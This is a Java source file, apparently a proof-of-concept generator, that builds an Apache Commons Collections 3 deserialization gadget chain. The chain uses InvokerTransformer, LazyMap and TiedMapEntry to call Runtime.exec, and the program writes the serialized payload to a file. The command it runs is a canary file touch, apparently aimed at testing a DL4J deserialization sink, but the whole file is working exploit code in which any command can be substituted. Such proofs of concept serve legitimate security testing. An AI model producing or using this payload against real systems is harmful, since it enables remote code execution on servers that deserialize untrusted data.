| import org.apache.commons.collections.Transformer; |
| import org.apache.commons.collections.functors.*; |
| import org.apache.commons.collections.map.LazyMap; |
| import org.apache.commons.collections.keyvalue.TiedMapEntry; |
| import java.io.*; import java.lang.reflect.*; import java.util.*; |
| public class GadgetGen3 { |
| public static void main(String[] a) throws Exception { |
| String out=a[0]; String[] cmd={"touch","/tmp/DL4J_RCE_CANARY"}; |
| Transformer[] t={ new ConstantTransformer(Runtime.class), |
| new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[0]}), |
| new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[0]}), |
| new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{cmd}) }; |
| Transformer chain=new ChainedTransformer(t); |
| Map lazyMap=LazyMap.decorate(new HashMap(), new ConstantTransformer(1)); |
| TiedMapEntry entry=new TiedMapEntry(lazyMap,"foo"); |
| HashMap<Object,Object> map=new HashMap<>(); map.put(entry,"bar"); |
| lazyMap.remove("foo"); |
| Field f=LazyMap.class.getDeclaredField("factory"); f.setAccessible(true); f.set(lazyMap, chain); |
| ByteArrayOutputStream b=new ByteArrayOutputStream(); new ObjectOutputStream(b).writeObject(map); |
| java.nio.file.Files.write(new File(out).toPath(), b.toByteArray()); |
| System.out.println("cc3 gadget written ("+b.size()+" bytes)"); |
| } |
| } |
|
|